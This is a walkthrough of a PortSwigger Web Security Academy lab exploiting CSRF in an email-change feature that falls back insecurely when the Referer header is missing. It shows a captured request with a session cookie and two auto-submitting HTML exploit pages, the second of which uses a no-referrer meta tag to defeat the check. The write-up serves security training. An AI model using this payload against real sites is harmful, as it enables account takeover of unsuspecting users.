This lab's email change functionality is vulnerable to CSRF. It attempts to block cross domain requests but has an insecure fallback.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You can log in to your own account using the following credentials: `wiener:peter`

# Practical
So let's login as :
```txt
wiener:peter
```
And let's send a request to change our email.
```txt
POST /my-account/change-email HTTP/1.1
Host: ac351f581e7c10638072035c00ca0042.web-security-academy.net
Cookie: session=wqRTWGfzS7v3ace4mMaDGVjWevDMVgv6
Content-Length: 23
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://ac351f581e7c10638072035c00ca0042.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac351f581e7c10638072035c00ca0042.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

email=wiener@hacker.com
```
So we can see that there is a referrer header. What if we remove it?
Well, the request still goes through since we're removing it by using Burp to modify our request.

This won't work if we want to change someone's else.
Let's start crafting our payload.
```html
<html>
  <body>
    <form action="https://ac351f581e7c10638072035c00ca0042.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
Okay so let's try submitting this to the victim first.
```txt
Invalid referrer header.
```
Okay so it checks where the request comes from by the referrer header.
Let's bypass it using a meta tag. I figured it out by searching on how to bypass referrer headers.
```html
<html>
  <body>
  <meta name="referrer" content="no-referrer">
    <form action="https://ac351f581e7c10638072035c00ca0042.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
Do note that there is no CSRF token in this page, and it only uses the referrer header to stop CSRF attacks.
Let's send the exploit.

And we managed to change the email and solved the lab.
